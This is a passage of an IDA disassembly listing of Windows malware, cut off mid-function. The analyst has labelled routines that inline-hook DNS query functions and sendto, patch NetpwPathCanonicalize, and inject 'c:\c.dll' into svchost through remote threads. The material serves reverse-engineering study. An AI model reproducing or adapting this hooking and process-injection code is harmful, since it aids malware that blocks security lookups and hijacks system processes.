loc_9AAE48: ; DATA XREF: .text:stru_9A4090�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AAE4B: ; CODE XREF: sub_9AAE1D+17�j
; sub_9AAE1D+25�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_9AAE1D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_9AAE58(char *lpFirst,int,int,int,int,int)
sub_9AAE58 proc near ; DATA XREF: sub_patch_DNS_APIs+9�o
lpFirst = dword ptr 8
push ebp
mov ebp, esp
cmp dword_9BB194, 0
jz short loc_9AAE7C
push [ebp+lpFirst] ; lpFirst
call sub_9AAE1D
test eax, eax
pop ecx
jnz short loc_9AAE7C
mov eax, dword_9BB194
add eax, 4
pop ebp
jmp eax
; ---------------------------------------------------------------------------
loc_9AAE7C: ; CODE XREF: sub_9AAE58+A�j
; sub_9AAE58+17�j
push 5B4h ; dwErrCode
call ds:SetLastError
mov eax, 5B4h
pop ebp
retn 18h
sub_9AAE58 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AAE90(LPCSTR lpMultiByteStr)
sub_9AAE90 proc near ; CODE XREF: sub_9AAF13+F�p
WideCharStr = word ptr -31Ch
First = byte ptr -11Ch
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
lpMultiByteStr = dword ptr 8
push 30Ch
push offset stru_9A40A0
call __SEH_prolog
xor edi, edi
mov [ebp+var_1C], edi
mov [ebp+ms_exc.disabled], edi
cmp [ebp+lpMultiByteStr], edi
jz short loc_9AAF06
mov esi, 100h
push esi ; cchWideChar
lea eax, [ebp+WideCharStr]
push eax ; lpWideCharStr
push 0FFFFFFFFh ; cbMultiByte
push [ebp+lpMultiByteStr] ; lpMultiByteStr
push edi ; dwFlags
push 0FDE9h ; CodePage
call ds:MultiByteToWideChar
test eax, eax
jz short loc_9AAF06
push edi ; lpUsedDefaultChar
push edi ; lpDefaultChar
push esi ; cbMultiByte
lea eax, [ebp+First]
push eax ; lpMultiByteStr
push 0FFFFFFFFh ; cchWideChar
lea eax, [ebp+WideCharStr]
push eax ; lpWideCharStr
push edi ; dwFlags
push edi ; CodePage
call ds:WideCharToMultiByte
test eax, eax
jz short loc_9AAF06
lea eax, [ebp+First]
push eax ; lpFirst
call sub_9A9D29
pop ecx
mov [ebp+var_1C], eax
jmp short loc_9AAF06
; ---------------------------------------------------------------------------
loc_9AAEFF: ; DATA XREF: .text:stru_9A40A0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AAF03: ; DATA XREF: .text:stru_9A40A0�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AAF06: ; CODE XREF: sub_9AAE90+1A�j
; sub_9AAE90+3C�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_9AAE90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_9AAF13(LPCSTR lpMultiByteStr,int,int,int,int,int)
sub_9AAF13 proc near ; DATA XREF: sub_patch_DNS_APIs+23�o
lpMultiByteStr = dword ptr 8
push ebp
mov ebp, esp
cmp dword_9BB198, 0
jz short loc_9AAF37
push [ebp+lpMultiByteStr] ; lpMultiByteStr
call sub_9AAE90
test eax, eax
pop ecx
jnz short loc_9AAF37
mov eax, dword_9BB198
add eax, 4
pop ebp
jmp eax
; ---------------------------------------------------------------------------
loc_9AAF37: ; CODE XREF: sub_9AAF13+A�j
; sub_9AAF13+17�j
push 5B4h ; dwErrCode
call ds:SetLastError
mov eax, 5B4h
pop ebp
retn 18h
sub_9AAF13 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AAF4B(LPCWSTR lpWideCharStr)
sub_9AAF4B proc near ; CODE XREF: sub_9AAFA9+F�p
First = byte ptr -11Ch
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
lpWideCharStr = dword ptr 8
push 10Ch
push offset stru_9A40B0
call __SEH_prolog
xor eax, eax
mov [ebp+ms_exc.disabled], eax
cmp [ebp+lpWideCharStr], eax
jz short loc_9AAF9C
push eax ; lpUsedDefaultChar
push eax ; lpDefaultChar
push 100h ; cbMultiByte
lea ecx, [ebp+First]
push ecx ; lpMultiByteStr
push 0FFFFFFFFh ; cchWideChar
push [ebp+lpWideCharStr] ; lpWideCharStr
push eax ; dwFlags
push eax ; CodePage
call ds:WideCharToMultiByte
test eax, eax
jz short loc_9AAF9C
lea eax, [ebp+First]
push eax ; lpFirst
call sub_9A9D29
pop ecx
mov [ebp+var_1C], eax
jmp short loc_9AAF9C
; ---------------------------------------------------------------------------
loc_9AAF95: ; DATA XREF: .text:stru_9A40B0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AAF99: ; DATA XREF: .text:stru_9A40B0�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AAF9C: ; CODE XREF: sub_9AAF4B+17�j
; sub_9AAF4B+36�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
xor eax, eax
inc eax
call __SEH_epilog
retn
sub_9AAF4B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_9AAFA9(LPCWSTR lpWideCharStr,int,int,int,int,int)
sub_9AAFA9 proc near ; DATA XREF: sub_patch_DNS_APIs+3A�o
lpWideCharStr = dword ptr 8
push ebp
mov ebp, esp
cmp dword_9BB19C, 0
jz short loc_9AAFCD
push [ebp+lpWideCharStr] ; lpWideCharStr
call sub_9AAF4B
test eax, eax
pop ecx
jnz short loc_9AAFCD
mov eax, dword_9BB19C
add eax, 4
pop ebp
jmp eax
; ---------------------------------------------------------------------------
loc_9AAFCD: ; CODE XREF: sub_9AAFA9+A�j
; sub_9AAFA9+17�j
push 5B4h ; dwErrCode
call ds:SetLastError
mov eax, 5B4h
pop ebp
retn 18h
sub_9AAFA9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AAFE1 proc near ; CODE XREF: .text:009AB057�p
First = byte ptr -11Ch
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 10Ch
push offset stru_9A40C0
call __SEH_prolog
mov eax, [ebp+arg_0]
xor ecx, ecx
mov [ebp+var_1C], ecx
mov [ebp+ms_exc.disabled], ecx
cmp eax, ecx
jz short loc_9AB03B
mov eax, [eax]
cmp eax, ecx
jz short loc_9AB03B
push ecx ; lpUsedDefaultChar
push ecx ; lpDefaultChar
push 100h ; cbMultiByte
lea edx, [ebp+First]
push edx ; lpMultiByteStr
push 0FFFFFFFFh ; cchWideChar
push eax ; lpWideCharStr
push ecx ; dwFlags
push ecx ; CodePage
call ds:WideCharToMultiByte
test eax, eax
jz short loc_9AB03B
lea eax, [ebp+First]
push eax ; lpFirst
call sub_9A9D29
pop ecx
mov [ebp+var_1C], eax
jmp short loc_9AB03B
; ---------------------------------------------------------------------------
loc_9AB034: ; DATA XREF: .text:stru_9A40C0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AB038: ; DATA XREF: .text:stru_9A40C0�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AB03B: ; CODE XREF: sub_9AAFE1+1C�j
; sub_9AAFE1+22�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_1C]
call __SEH_epilog
retn 4
sub_9AAFE1 endp
; ---------------------------------------------------------------------------
loc_9AB04A: ; DATA XREF: sub_patch_DNS_APIs+51�o
cmp dword_9BB1A0, 0
jz short loc_9AB06A
push dword ptr [esp+4]
call sub_9AAFE1
test eax, eax
jnz short loc_9AB06A
mov eax, dword_9BB1A0
add eax, 4
jmp eax
; ---------------------------------------------------------------------------
loc_9AB06A: ; CODE XREF: .text:009AB051�j
; .text:009AB05E�j
push 5B4h
call ds:SetLastError
mov eax, 5B4h
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AB07D proc near ; CODE XREF: sub_9AB296+12�p
Dst = dword ptr -244h
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 234h
push offset stru_9A40D0
call __SEH_prolog
xor ebx, ebx
mov [ebp+var_1C], ebx
mov [ebp+ms_exc.disabled], ebx
call ds:GetCurrentProcessId
push eax ; th32ProcessID
push 8 ; dwFlags
call CreateToolhelp32Snapshot
mov edi, eax
mov [ebp+var_20], edi
cmp edi, 0FFFFFFFFh
jz short loc_9AB123
mov esi, 224h
push esi ; Size
push ebx ; Val
lea eax, [ebp+Dst]
push eax ; Dst
call memset
add esp, 0Ch
mov [ebp+Dst], esi
lea eax, [ebp+Dst]
push eax ; lpme
push edi ; hSnapshot
call Module32First
jmp short loc_9AB10F
; ---------------------------------------------------------------------------
loc_9AB0D7: ; CODE XREF: sub_9AB07D+94�j
mov eax, [ebp+var_230]
cmp [ebp+arg_0], eax
jb short loc_9AB102
mov ecx, [ebp+var_22C]
add ecx, eax
cmp [ebp+arg_0], ecx
jnb short loc_9AB102
cmp [ebp+arg_4], ebx
jz short loc_9AB0F9
cmp eax, [ebp+arg_4]
jnz short loc_9AB102
loc_9AB0F9: ; CODE XREF: sub_9AB07D+75�j
mov [ebp+var_1C], 1
jmp short loc_9AB113
; ---------------------------------------------------------------------------
loc_9AB102: ; CODE XREF: sub_9AB07D+63�j
; sub_9AB07D+70�j ...
lea eax, [ebp+Dst]
push eax ; lpme
push edi ; hSnapshot
call Module32Next
loc_9AB10F: ; CODE XREF: sub_9AB07D+58�j
test eax, eax
jnz short loc_9AB0D7
loc_9AB113: ; CODE XREF: sub_9AB07D+83�j
push edi ; hObject
call ds:CloseHandle
jmp short loc_9AB123
; ---------------------------------------------------------------------------
loc_9AB11C: ; DATA XREF: .text:stru_9A40D0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AB120: ; DATA XREF: .text:stru_9A40D0�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AB123: ; CODE XREF: sub_9AB07D+2D�j
; sub_9AB07D+9D�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_9AB07D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AB130 proc near ; CODE XREF: sub_9AB1C8+65�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 18h
push offset stru_9A40E0
call __SEH_prolog
xor edi, edi
mov [ebp+var_24], edi
mov [ebp+ms_exc.disabled], edi
mov esi, [ebp+arg_0]
add esi, 0Ch
mov [ebp+var_1C], esi
loc_9AB14D: ; CODE XREF: sub_9AB130+95�j
mov [ebp+var_20], edi
loc_9AB150: ; CODE XREF: sub_9AB130+8B�j
cmp edi, [ebp+arg_C]
jnb short loc_9AB169
mov al, [esi]
test al, al
jnz short loc_9AB17B
mov [ebp+var_24], 1
mov eax, [ebp+arg_8]
mov byte ptr [edi+eax], 0
loc_9AB169: ; CODE XREF: sub_9AB130+23�j
; sub_9AB130+5D�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call nullsub_1
mov eax, [ebp+var_24]
call __SEH_epilog
retn
; ---------------------------------------------------------------------------
loc_9AB17B: ; CODE XREF: sub_9AB130+29�j
movsx ebx, al
mov [ebp+var_28], ebx
inc esi
mov [ebp+var_1C], esi
mov eax, esi
sub eax, [ebp+arg_0]
cmp eax, [ebp+arg_4]
jnb short loc_9AB169
push ebx ; Size
push esi ; Src
mov eax, [ebp+arg_8]
add eax, edi
push eax ; Dst
call memcpy
add esp, 0Ch
add esi, ebx
mov [ebp+var_1C], esi
add edi, ebx
mov [ebp+var_20], edi
cmp edi, [ebp+arg_C]
jnb short loc_9AB169
mov eax, esi
sub eax, [ebp+arg_0]
cmp eax, [ebp+arg_4]
jnb short loc_9AB169
cmp byte ptr [esi], 0
jz short loc_9AB150
mov eax, [ebp+arg_8]
mov byte ptr [edi+eax], 2Eh
inc edi
jmp short loc_9AB14D
sub_9AB130 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AB1C8 proc near ; CODE XREF: sub_9AB296+23�p
First = byte ptr -128h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 118h
push offset stru_9A40F0
call __SEH_prolog
mov esi, edx
xor edi, edi
mov [ebp+ms_exc.disabled], edi
mov [ebp+var_20], esi
mov al, [esi+2]
test al, 78h
jnz loc_9AB28C
test al, 1
jz loc_9AB28C
cmp [esi+6], di
jnz loc_9AB28C
cmp [esi+8], di
jnz loc_9AB28C
cmp [esi+0Ah], di
jnz short loc_9AB28C
cmp byte ptr [esi+ecx-5], 0
jnz short loc_9AB28C
cmp dword ptr [esi+ecx-4], 1000100h
jnz short loc_9AB28C
push 104h
lea eax, [ebp+First]
push eax
push ecx
push esi
call sub_9AB130
add esp, 10h
test eax, eax
jz short loc_9AB28C
lea eax, [ebp+First]
push eax ; lpFirst
call sub_9A9D29
pop ecx
test eax, eax
jz short loc_9AB28C
lea eax, [ebp+First]
push eax ; Str
call strlen
pop ecx
mov ebx, eax
mov [ebp+var_24], ebx
mov [ebp+var_1C], edi
loc_9AB25F: ; CODE XREF: sub_9AB1C8+B6�j
cmp [ebp+var_1C], ebx
jnb short loc_9AB280
call ds:rand
xor edx, edx
push 1Ah
pop ecx
div ecx
add edx, 61h
mov eax, [ebp+var_1C]
mov [eax+esi+0Dh], dl
inc [ebp+var_1C]
jmp short loc_9AB25F
; ---------------------------------------------------------------------------
loc_9AB280: ; CODE XREF: sub_9AB1C8+9A�j
mov [esi+0Ch], bl
jmp short loc_9AB28C
; ---------------------------------------------------------------------------
loc_9AB285: ; DATA XREF: .text:stru_9A40F0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AB289: ; DATA XREF: .text:stru_9A40F0�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AB28C: ; CODE XREF: sub_9AB1C8+1E�j
; sub_9AB1C8+26�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call __SEH_epilog
retn
sub_9AB1C8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AB296 proc near ; DATA XREF: sub_patch_DNS_rslvr_APIs+1A�o
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 12h
jl short loc_9AB2BE
push dword_9BB1A8
push dword ptr [ebp+4]
call sub_9AB07D
test eax, eax
pop ecx
pop ecx
jz short loc_9AB2BE
mov ecx, [ebp+arg_8]
mov edx, [ebp+arg_4]
call sub_9AB1C8
loc_9AB2BE: ; CODE XREF: sub_9AB296+7�j
; sub_9AB296+1B�j
mov eax, dword_9BB1A4
add eax, 4
pop ebp
jmp eax
sub_9AB296 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AB2C9(LPVOID lpAddress)
sub_9AB2C9 proc near ; CODE XREF: sub_9AB408+51�p
Src = byte ptr -40h
var_3F = dword ptr -3Fh
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
nPriority = dword ptr -28h
flOldProtect = dword ptr -24h
var_20 = dword ptr -20h
hThread = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
lpAddress = dword ptr 8
push 30h
push offset stru_9A4100
call __SEH_prolog
mov esi, ecx
mov edi, edx
xor ebx, ebx
mov [ebp+var_2C], ebx
call ds:GetCurrentThread
mov [ebp+hThread], eax
push eax ; hThread
call ds:GetThreadPriority
mov [ebp+nPriority], eax
mov [ebp+ms_exc.disabled], ebx
push 2Ch ; Size
push ebx ; Val
push esi ; Dst
call memset
add esp, 0Ch
mov [esi+28h], edi
mov ecx, [ebp+lpAddress]
mov [esi+24h], ecx
mov [ebp+var_20], ecx
mov [ebp+var_34], ebx
mov [ebp+var_38], 5
loc_9AB316: ; CODE XREF: sub_9AB2C9+9F�j
cmp ebx, 5
jge short loc_9AB375
mov eax, [ebp+var_20]
add eax, ebx
push eax
call loc_9B7EA0
mov [ebp+var_30], eax
lea ecx, [ebx+esi+4]
push eax ; Size
mov eax, [ebp+var_20]
add eax, ebx
push eax ; Src
push ecx ; Dst
call memcpy
add esp, 10h
mov al, [ebx+esi+4]
mov cl, al
and cl, 0FEh
cmp cl, 0E8h
jz short loc_9AB36A
cmp al, 0FFh
jnz short loc_9AB35B
mov al, [ebx+esi+5]
cmp al, 25h
jz short loc_9AB36A
cmp al, 15h
jz short loc_9AB36A
loc_9AB35B: ; CODE XREF: sub_9AB2C9+84�j
mov eax, [ebp+var_30]
add ebx, eax
mov [esi], ebx
mov [ebp+var_34], ebx
mov ecx, [ebp+lpAddress]
jmp short loc_9AB316
; ---------------------------------------------------------------------------
loc_9AB36A: ; CODE XREF: sub_9AB2C9+80�j
; sub_9AB2C9+8C�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
xor eax, eax
jmp loc_9AB402
; ---------------------------------------------------------------------------
loc_9AB375: ; CODE XREF: sub_9AB2C9+50�j
lea eax, [ebx+esi]
mov byte ptr [eax+4], 0E9h
mov edx, [esi]
sub edx, ebx
sub edx, esi
lea edx, [edx+ecx-9]
mov [eax+5], edx
lea eax, [ebp+flOldProtect]
push eax ; lpflOldProtect
push 40h ; flNewProtect
push dword ptr [esi] ; dwSize
push ecx ; lpAddress
mov ebx, ds:VirtualProtect
call ebx ; VirtualProtect
test eax, eax
jz short loc_9AB3FB
mov [ebp+Src], 0E9h
sub edi, [ebp+lpAddress]
sub edi, 5
mov [ebp+var_3F], edi
push 0Fh ; nPriority
push [ebp+hThread] ; hThread
mov edi, ds:SetThreadPriority
call edi ; SetThreadPriority
push 5 ; Size
lea eax, [ebp+Src]
push eax ; Src
push [ebp+lpAddress] ; Dst
call memcpy
add esp, 0Ch
push [ebp+nPriority] ; nPriority
push [ebp+hThread] ; hThread
call edi ; SetThreadPriority
lea eax, [ebp+flOldProtect]
push eax ; lpflOldProtect
push [ebp+flOldProtect] ; flNewProtect
push dword ptr [esi] ; dwSize
push [ebp+lpAddress] ; lpAddress
call ebx ; VirtualProtect
mov [ebp+var_2C], 1
jmp short loc_9AB3FB
; ---------------------------------------------------------------------------
loc_9AB3E8: ; DATA XREF: .text:stru_9A4100�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AB3EC: ; DATA XREF: .text:stru_9A4100�o
mov esp, [ebp+ms_exc.old_esp]
push [ebp+nPriority] ; nPriority
push [ebp+hThread] ; hThread
call ds:SetThreadPriority
loc_9AB3FB: ; CODE XREF: sub_9AB2C9+D3�j
; sub_9AB2C9+11D�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_2C]
loc_9AB402: ; CODE XREF: sub_9AB2C9+A7�j
call __SEH_epilog
retn
sub_9AB2C9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AB408(LPCSTR lpLibFileName,LPCSTR lpProcName,int,int)
sub_9AB408 proc near ; CODE XREF: sub_patch_NetpwPathCanonicalize+14�p
; sub_9AB49A+14�p ...
lpLibFileName = dword ptr 8
lpProcName = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push edi
push [ebp+lpLibFileName] ; lpModuleName
xor edi, edi
call ds:GetModuleHandleA
test eax, eax
jnz short loc_9AB428
push [ebp+lpLibFileName] ; lpLibFileName
call ds:LoadLibraryA
test eax, eax
jz short loc_9AB478
loc_9AB428: ; CODE XREF: sub_9AB408+11�j
push esi
push [ebp+lpProcName] ; lpProcName
push eax ; hModule
call ds:GetProcAddress
mov esi, eax
test esi, esi
jz short loc_9AB477
push 40h ; flProtect
push 103000h ; flAllocationType
push 2Ch ; dwSize
push 0 ; lpAddress
call ds:VirtualAlloc
test eax, eax
mov ecx, [ebp+arg_C]
mov [ecx], eax
jz short loc_9AB477
mov edx, [ebp+arg_8]
push esi ; lpAddress
mov ecx, eax
call sub_9AB2C9
mov edi, eax
test edi, edi
pop ecx
jnz short loc_9AB477
push 8000h ; dwFreeType
push eax ; dwSize
push lpAddress ; lpAddress
call ds:VirtualFree
loc_9AB477: ; CODE XREF: sub_9AB408+2F�j
; sub_9AB408+49�j ...
pop esi
loc_9AB478: ; CODE XREF: sub_9AB408+1E�j
mov eax, edi
pop edi
pop ebp
retn
sub_9AB408 endp
; =============== S U B R O U T I N E =======================================
sub_patch_NetpwPathCanonicalize proc near ; CODE XREF: sub_main+1B6�p
; sub_main+1D0�p
push offset lpAddress ; int
push offset sub_9AAD64 ; int
push offset aNetpwpathcanon ; "NetpwPathCanonicalize"
push offset dword_9A410C ; lpLibFileName
call sub_9AB408
add esp, 10h
retn
sub_patch_NetpwPathCanonicalize endp
; =============== S U B R O U T I N E =======================================
sub_9AB49A proc near ; CODE XREF: sub_main+29�p
push offset dword_9BB190 ; int
push offset sub_9AADCD ; int
push offset aNtqueryinforma ; "NtQueryInformationProcess"
push offset aNtdll_dll ; "ntdll.dll"
call sub_9AB408
add esp, 10h
retn
sub_9AB49A endp
; =============== S U B R O U T I N E =======================================
sub_patch_DNS_APIs proc near ; CODE XREF: sub_main+1E5�p
push ebx
push ebp
push esi
push edi
push offset dword_9BB194 ; int
push offset sub_9AAE58 ; int
push offset aDnsquery_a ; "DnsQuery_A"
mov esi, offset aDnsapi_dll ; "dnsapi.dll"
push esi ; lpLibFileName
call sub_9AB408
push offset dword_9BB198 ; int
push offset sub_9AAF13 ; int
push offset aDnsquery_utf8 ; "DnsQuery_UTF8"
push esi ; lpLibFileName
mov edi, eax
call sub_9AB408
push offset dword_9BB19C ; int
push offset sub_9AAFA9 ; int
push offset aDnsquery_w ; "DnsQuery_W"
push esi ; lpLibFileName
mov ebx, eax
call sub_9AB408
push offset dword_9BB1A0 ; int
push offset loc_9AB04A ; int
push offset aQuery_main ; "Query_Main"
push esi ; lpLibFileName
mov ebp, eax
call sub_9AB408
add esp, 40h
test edi, edi
jz short loc_9AB52E
test ebx, ebx
jz short loc_9AB52E
test ebp, ebp
jz short loc_9AB52E
xor eax, eax
inc eax
jmp short loc_9AB530
; ---------------------------------------------------------------------------
loc_9AB52E: ; CODE XREF: sub_patch_DNS_APIs+68�j
; sub_patch_DNS_APIs+6C�j ...
xor eax, eax
loc_9AB530: ; CODE XREF: sub_patch_DNS_APIs+75�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_patch_DNS_APIs endp
; =============== S U B R O U T I N E =======================================
sub_patch_DNS_rslvr_APIs proc near ; CODE XREF: sub_main+1BB�p
push offset ModuleName ; "dnsrslvr.dll"
call ds:GetModuleHandleA
test eax, eax
mov dword_9BB1A8, eax
jnz short loc_9AB54A
retn
; ---------------------------------------------------------------------------
loc_9AB54A: ; CODE XREF: sub_patch_DNS_rslvr_APIs+12�j
push offset dword_9BB1A4 ; int
push offset sub_9AB296 ; int
push offset aSendto ; "sendto"
push offset aWs2_32_dll ; "ws2_32.dll"
call sub_9AB408
add esp, 10h
retn
sub_patch_DNS_rslvr_APIs endp
; =============== S U B R O U T I N E =======================================
sub_find_svchost_and_attach proc near ; CODE XREF: StartAddress:loc_9A7803�p
push esi
xor esi, esi
loc_9AB56A: ; CODE XREF: sub_find_svchost_and_attach+21�j
push offset aSvchost_exeKNe ; "svchost.exe -k NetworkService"
call sub_find_svchost_process_id
test eax, eax
pop ecx
jnz short loc_9AB58C
push 3E8h ; dwMilliseconds
call ds:Sleep
inc esi
cmp esi, 14h
jl short loc_9AB56A
pop esi
retn
; ---------------------------------------------------------------------------
loc_9AB58C: ; CODE XREF: sub_find_svchost_and_attach+10�j
push offset FileName ; "c:\\c.dll"
push eax ; dwProcessId
call sub_CreateRemoteThreasandwriteProcessMemory
pop ecx
pop ecx
pop esi
retn
sub_find_svchost_and_attach endp
; =============== S U B R O U T I N E =======================================
sub_9AB59B proc near ; CODE XREF: StartAddress+58�p
push esi
xor esi, esi
loc_9AB59E: ; CODE XREF: sub_9AB59B+21�j
push offset aYsecurity ; "ySecurity"
call sub_find_process_handle_by_name
test eax, eax
pop ecx
jnz short loc_9AB5C0
push 3E8h ; dwMilliseconds
call ds:Sleep
inc esi
cmp esi, 14h
jl short loc_9AB59E
pop esi
retn
; ---------------------------------------------------------------------------
loc_9AB5C0: ; CODE XREF: sub_9AB59B+10�j
push offset FileName ; "c:\\c.dll"
push eax ; dwProcessId
call sub_CreateRemoteThreasandwriteProcessMemory
pop ecx
pop ecx
pop esi
retn
sub_9AB59B endp
; =============== S U B R O U T I N E =======================================
sub_9AB5CF proc near ; CODE XREF: sub_9AB855+1AF�p
; sub_9AB855+1E6�p ...
arg_0 = dword ptr 4
call ds:rand
push 0Ah
cdq
pop ecx
idiv ecx
test edx, edx
jz short locret_9AB5F6
push esi
mov esi, edx
loc_9AB5E2: ; CODE XREF: sub_9AB5CF+24�j
push offset asc_9A41FC ; " "
push [esp+8+arg_0]
call _mbscat
dec esi
pop ecx
pop ecx
jnz short loc_9AB5E2
pop esi
locret_9AB5F6: ; CODE XREF: sub_9AB5CF+E�j
retn
sub_9AB5CF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AB5F7 proc near ; CODE XREF: sub_9AB6D6+59�p
; sub_9AB6D6+7D�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push esi
mov esi, ds:rand
call esi ; rand
push 0Ah
cdq
pop ecx
idiv ecx
test edx, edx
jz short loc_9AB638
push edi
mov edi, edx
loc_9AB611: ; CODE XREF: sub_9AB5F7+25�j
; sub_9AB5F7+29�j ...
call esi ; rand
and al, 1Fh
inc al
cmp al, 0Dh
mov [ebp+var_4], al
jz short loc_9AB611
cmp al, 0Ah
jz short loc_9AB611
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
mov [ebp+var_3], 0
call _mbscat
dec edi
pop ecx
pop ecx
jnz short loc_9AB611
pop edi
loc_9AB638: ; CODE XREF: sub_9AB5F7+15�j
pop esi
leave
retn
sub_9AB5F7 endp
; =============== S U B R O U T I N E =======================================
sub_9AB63B proc near ; CODE XREF: sub_9AB6D6:loc_9AB759�p
; sub_9AB7A5+4E�p ...
call ds:rand
push 3
cdq
pop ecx
idiv ecx
sub edx, 0
jz short loc_9AB660
dec edx
jz short loc_9AB659
dec edx
jnz short locret_9AB66D
push offset asc_9A4208 ; "\n"
jmp short loc_9AB665
; ---------------------------------------------------------------------------
loc_9AB659: ; CODE XREF: sub_9AB63B+12�j
push offset asc_9A4204 ; "\r"
jmp short loc_9AB665
; ---------------------------------------------------------------------------
loc_9AB660: ; CODE XREF: sub_9AB63B+F�j
push offset asc_9A4200 ; "\r\n"
loc_9AB665: ; CODE XREF: sub_9AB63B+1C�j
; sub_9AB63B+23�j
push esi
call _mbscat
pop ecx
pop ecx
locret_9AB66D: ; CODE XREF: sub_9AB63B+15�j
retn
sub_9AB63B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AB66E proc near ; CODE XREF: sub_9AB6D6+72�p
; sub_9AB7A5+20�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
mov esi, ds:rand
call esi ; rand
push 19h
cdq
pop ecx
idiv ecx
inc edx
jz short loc_9AB6D3
push edi
mov edi, edx
loc_9AB687: ; CODE XREF: sub_9AB66E+62�j
cmp [ebp+arg_4], 0
jz short loc_9AB6A5
call esi ; rand
test al, 1
jnz short loc_9AB6A5
call esi ; rand
cdq
mov ecx, 80h
idiv ecx
add dl, 80h
mov [ebp+var_4], dl
jmp short loc_9AB6BD
; ---------------------------------------------------------------------------
loc_9AB6A5: ; CODE XREF: sub_9AB66E+1D�j
; sub_9AB66E+23�j
call esi ; rand
cdq
push 1Ah
pop ecx
idiv ecx
add dl, 41h
mov [ebp+var_4], dl
call esi ; rand
test al, 1
jz short loc_9AB6BD
or [ebp+var_4], 20h
loc_9AB6BD: ; CODE XREF: sub_9AB66E+35�j
; sub_9AB66E+49�j
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
mov [ebp+var_3], 0
call _mbscat
dec edi
pop ecx
pop ecx
jnz short loc_9AB687
pop edi
loc_9AB6D3: ; CODE XREF: sub_9AB66E+14�j
pop esi
leave
retn
sub_9AB66E endp
; =============== S U B R O U T I N E =======================================
sub_9AB6D6 proc near ; CODE XREF: sub_9AB7A5+55�p
; sub_9AB7A5+A5�p ...
push esi
push edi
mov edi, ds:rand
mov esi, eax
call edi ; rand
push 0Ah
cdq
pop ecx
idiv ecx
test edx, edx
jz short loc_9AB763
push ebx
push ebp
mov ebp, edx
loc_9AB6F0: ; CODE XREF: sub_9AB6D6+89�j
call edi ; rand
push 3
cdq
pop ecx
idiv ecx
sub edx, 0
jz short loc_9AB723
dec edx
jz short loc_9AB752
dec edx
jnz short loc_9AB75E
call edi ; rand
push 1Eh
cdq
pop ecx
